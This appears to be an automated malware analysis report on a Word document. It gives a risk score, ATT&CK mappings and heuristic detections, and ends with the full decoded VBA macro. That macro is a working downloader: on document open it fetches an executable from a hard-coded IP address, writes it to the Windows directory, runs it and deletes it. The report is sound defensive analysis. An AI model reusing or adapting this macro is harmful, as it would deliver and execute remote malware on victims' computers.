MALICIOUS
298
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
The sample contains a VBA macro with an autoopen subroutine that uses the URLDownloadToFile API to download a file from http://81.27.111.103/ek/liu8080.exe. The downloaded file is then saved as C:\Windows\temp.exe and executed using the Shell function. This indicates a downloader functionality, aiming to fetch and run a second-stage payload.
Heuristics 9
-
ClamAV: Win.Downloader.Agent-34522 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Downloader.Agent-34522
-
Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOADReference to URLDownloadToFile API
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
DownloadFile lURL, szFileLocal & "\temp.exe" Shell szFileLocal & "\temp.exe" Kill szFileLocal & "\temp.exe" -
URLDownloadToFile in VBA critical OLE_VBA_DOWNLOADURLDownloadToFile in VBAMatched line in script
Attribute VB_Name = "Module1" Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Sub autoopen() -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long Sub autoopen() On Error Resume Next -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Dim lURL As String szFileLocal = Environ("windir") lURL = "http://81.27.111.103/ek/liu8080.exe" -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://81.27.111.103/ek/liu8080.exe Referenced by macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1081 bytes |
SHA-256: 6ff0903b95edb3bcebac0d543ac9c3b7a93163695dac57acd71c62bd614f1a02 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Public Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA" (ByVal pCaller As Long, ByVal szURL As String, ByVal szFileName As String, ByVal dwReserved As Long, ByVal lpfnCB As Long) As Long
Sub autoopen()
On Error Resume Next
Dim szFileLocal
Dim lURL As String
szFileLocal = Environ("windir")
lURL = "http://81.27.111.103/ek/liu8080.exe"
DownloadFile lURL, szFileLocal & "\temp.exe"
Shell szFileLocal & "\temp.exe"
Kill szFileLocal & "\temp.exe"
End Sub
Function DownloadFile(URL As String, LocalFilename As String) As Boolean
Dim lngRetVal As Long
lngRetVal = URLDownloadToFile(0, URL, LocalFilename, 0, 0)
If lngRetVal = 0 Then DownloadFile = True
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.